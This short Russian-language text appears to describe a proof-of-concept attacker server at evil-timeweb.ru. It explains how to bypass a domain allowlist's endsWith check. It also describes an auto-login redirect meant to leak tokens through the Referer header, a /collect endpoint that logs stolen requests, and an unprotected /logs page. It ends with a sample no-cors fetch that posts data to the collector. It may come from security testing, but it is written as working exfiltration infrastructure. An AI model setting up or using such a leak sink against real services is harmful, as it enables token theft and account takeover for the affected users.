Host: evil-timeweb.ru
*.tw1.ru не проходит allowlist
(ожидается 500). Для обхода endsWith нужен домен вроде
evil-timeweb.com. Этот App — sink / хост для сбора утечек.
/health/go-wm?token=UUID — 302 на wm auto-login (Referer = этот хост)/collect?… — лог запроса (GET/POST), ответ 204/logs (POC_SECRET не задан — открыто)/echofetch('/collect?x=1', {method:'POST', body:'hello', mode:'no-cors'})